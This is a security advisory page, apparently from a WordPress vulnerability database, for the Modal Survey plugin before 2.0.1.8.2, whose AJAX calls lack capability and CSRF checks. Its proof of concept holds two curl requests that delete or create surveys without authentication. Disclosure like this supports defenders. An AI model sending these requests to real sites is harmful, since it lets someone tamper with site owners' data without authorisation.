Modal Survey < 2.0.1.8.2 – Unauthenticated Arbitrary Survey Update, Deletion and Creation | Plugin Vulnerabilities

Description

The plugin AJAX calls (including unauthenticated ones) did not have capabilities and CSRF checks, allowing unauthenticated users to update, delete or create arbitrary surveys.

Proof of Concept

curl --url https://exmple.com/wp-admin/admin-ajax.php --data "action=ajax_survey&sspcmd=delete&survey_id=110251535"

curl --url https://example.com/wp-admin/admin-ajax.php --data 'action=ajax_survey&sspcmd=add&survey_id=1337&survey_name=test'

Affects Plugins

Fixed in 2.0.1.8.2

References

URL

http://modalsurvey.pantherius.com/documentation/#line14

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Pagely

Submitter

John Castro

Submitter website

https://pagely.com/

Submitter twitter

Verified

No

WPVDB ID

976c79e3-dd2c-4fb1-bbe2-5b3d7549b4b3

Timeline

Publicly Published

2021-01-08 (about 3 years ago)

Added

2021-01-08 (about 3 years ago)

Last Updated

2021-01-10 (about 3 years ago)

Other

Published

Title

Published

2021-10-20

Title

Responsive Image Slider, Photo Gallery And Carousel < 1.3.6 - Subscriber+ Arbitrary Post Access

Published

2024-04-15

Title

Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds for Google, Facebook/Meta, Bing, & More < 13.3.2 - Sensitive Information Exposure via Log Files

Published

2021-08-18

Title

Visual Link Preview < 2.2.3 - Unauthorised AJAX Calls

Published

2024-02-16

Title

My Private Site < 3.1.0 - Improper Access Control to Sensitive Information Exposure via REST API

Published

2020-12-09

Title

DiveBook <= 1.1.4 - Improper Authorisation Check